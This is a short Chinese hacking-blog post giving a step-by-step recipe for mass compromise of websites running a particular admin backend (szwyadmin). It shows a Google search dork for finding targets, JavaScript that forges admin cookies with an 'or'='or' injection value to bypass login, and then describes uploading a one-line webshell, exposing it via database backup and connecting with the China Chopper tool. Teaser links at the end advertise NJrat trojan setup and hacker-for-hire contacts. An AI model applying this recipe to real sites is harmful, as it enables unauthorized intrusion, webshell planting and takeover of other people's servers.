利用关键字后台批量拿shell

hacker4年前黑客文章1758

google:关键字:inurl:szwyadmin/login.asp

打开任意一个搜索结果,打开后台登录界面后,在地址栏中全部替换成下面代码:

javascript:alert(document.cookie=”adminuser=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”admindj=”+escape(“1″));

如果以上的代码不能使用请下载:http://pan.baidu.com/s/11PuhB

然后关闭此页面
再次打开后台登录界面
在地址栏中把login.asp改为admin_index.asp
就直接进入后台了。

进入后台后在添加新闻的地方上传一句话后,复制链接地址:

szwyadmin

然后点击备份如下图:

20131022124743

然后点击备份数据,备份成功后得到地址:

20131022130809

拿起菜刀链接:

20131022125456

 

标签: 黑客技术

相关文章

韩剧《幽灵》电视剧中出现的黑客软件工具

韩剧《幽灵》电视剧中出现的黑客软件工具 一、入侵检测类: 1、Wireshark 抓包工具,前称Ethereal。是一个网络封包分析软件,用来撷取网络封包,并尽可能显示...

入侵网站时的十种小经验

入侵网站时的十种小经验

入侵网站时的十种小经验 1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/for...

NJrat木马病毒如何配置?

NJrat木马病毒如何配置?

不久前,有一个事在新浪微博特火的,一名程序猿用了一款姓名叫NJrat的木马病毒反控制了互联网诈骗犯。   用木马病毒来基础学习网络黑客专业知识,会让许多新手有兴趣爱好。 但是许多新手在检测...

黑客技术怎么找(黑客入侵接单)

技术怎么怎么找黑客 1、黑客全球冠军。技术怎么入侵接单Break,但是星夜点黑客接单芒之中。Eric。寻找黑客其它就简便了,除非你的手机连着电脑。将不对任何资源负法律责任,很容权易中病毒,d。技术怎么...

谁能找到免费黑客人员联系方式?求告知黑客联系方式

在一些好莱坞电影中,我们经常看到超级黑客在电脑前“侵入”别人的安全系统。你能熟练、轻松地输入很多复杂的代码,而且不会一下子全部入侵/破解,这是不是令人羡慕?事实上,我们也可以像电影和游戏中的黑客一样攻...

GDB或GNUProject程序调试

GDB或GNUProject程序调试

什么叫GDB? GDB或GNU Project程序调试是一种网络信息安全数据加密/黑客工具,容许客户在运作时在网络技术应用程序流程或程序流程(手机软件)中开展财务审计和发觉。GDB针对开发者或程序猿...